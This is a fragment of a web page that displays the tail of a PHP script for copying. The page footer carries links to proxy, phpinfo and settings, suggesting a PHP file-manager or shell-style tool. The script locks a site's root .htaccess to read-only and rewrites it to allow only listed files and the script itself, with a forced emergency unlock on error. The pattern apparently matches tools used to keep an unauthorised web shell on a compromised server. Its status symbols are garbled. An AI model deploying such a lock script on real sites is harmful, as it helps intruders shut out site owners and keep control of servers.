ROOT HTACCESS: 0555 π (FINAL LOCK!) β\n"; echo "ββββββββββββββββββββββββββββββββββββββββββββ\n"; } @chmod($currentScript, 0644); echo "\nβ Completed safely at " . date('H:i:s') . "\n"; } catch (\Throwable $e) { echo "\nβ ERROR CAUGHT:\n"; echo "Message: " . $e->getMessage() . "\n"; echo "File: " . $e->getFile() . ":" . $e->getLine() . "\n"; echo "\nπ¨ EMERGENCY: Unlocking all for recovery...\n"; @chmod($baseDir, 0755); @chmod($currentScript, 0644); // Emergency: Unlock htaccess juga unlockRootHtaccess($htaccess); recursiveUnlockFoldersOnly_Safe($baseDir); try { paksaTulis($htaccess, generateValidHtaccess($allowedFiles, basename($currentScript))); echo "β Htaccess recovered\n"; } catch (\Throwable $e2) { echo "β Could not recover htaccess\n"; } echo "β Emergency unlock completed.\n"; } echo "</pre></div>"; ?></pre> </div> </div> <script> function copyCode() { const codeBlock = document.getElementById('codeBlock'); const textArea = document.createElement('textarea'); textArea.value = codeBlock.innerText; document.body.appendChild(textArea); textArea.select(); document.execCommand('copy'); document.body.removeChild(textArea); const btn = document.querySelector('.copy-btn'); const originalText = btn.innerText; btn.innerText = 'β Copied!'; btn.style.background = '#28a745'; setTimeout(() => { btn.innerText = originalText; btn.style.background = '#667eea'; }, 2500); } </script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 8.2.31 | Generation time: 0.17 |
proxy
|
phpinfo
|
Settings